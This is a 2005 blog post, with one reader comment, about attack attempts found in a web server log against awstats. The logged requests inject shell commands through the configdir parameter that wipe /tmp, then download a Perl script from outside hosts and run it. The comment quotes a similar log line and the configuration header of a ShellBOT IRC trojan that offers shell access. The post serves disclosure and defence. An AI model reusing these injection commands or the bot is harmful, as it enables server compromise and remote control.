Friday, July 8, 2005

potential security hole in awstats [updated]


I noticed the following entries in my log file:


66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")




I sent emails to the administrations of the various involved networks to have them stop this activity.  Also, since I am assuming that the script writer is attempting to exploit a hole, that there is, or was, one in awstats.  I have left a message on the Awstats developer forum, so they can look into this potential problem.


Update:  This was fixed in the 6.4 version of awstats.  If you are running an earlier version, you should update your awstats install.


Technorati Tags: ,

1 comment:

  1. This is part of the log
    219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    This a.txt file has the header
    #!/usr/bin/perl
    #
    # ShellBOT - FBI TEAM Corporation
    #
    # 0ldW0lf - effbeeye81@aol.com
    # - www.security.cnc.net
    #
    #
    #
    ################ CONFIGURACAO #################################################################
    my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
    #----------------------------------------------################################################
    my $linas_max='8'; # Evita o flood :) depois de X linhas #
    #----------------------------------------------################################################
    my $sleep='4'; # ele dorme X segundos #
    ##################### IRC #####################################################################
    my @adms=("the-brain","adilcm","alalah"); # Nick do administrador
    #
    #----------------------------------------------################################################
    my @canais=("#kit *"); # Caso haja senha ("#canal :senha") #
    #----------------------------------------------################################################
    my $nick='`alah'; # Nick do bot. Caso esteja em uso vai aparecer #
    # aparecer com numero radonamico no final #
    #----------------------------------------------################################################
    my $ircname = 'super'; # User ID
    #
    #----------------------------------------------################################################
    chop (my $realname = `uname -a`); # Full Name #
    #----------------------------------------------################################################
    $servidor='213.150.48.155' unless $servidor; # Servidor de irc que vai ser usado #
    # caso não seja especificado no argumento #
    #----------------------------------------------################################################
    my $porta='6667'; # Porta do servidor de irc #
    ################ ACESSO A SHELL ###############################################################
    my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
    ###############################################################################################

    ReplyDelete

Seamless Local Control: Integrating WeatherFlow with Home Assistant Across VLANs

I've been pleased with my Home Assistant setup for some time now. One of my main focuses has been achieving local control. This ensures...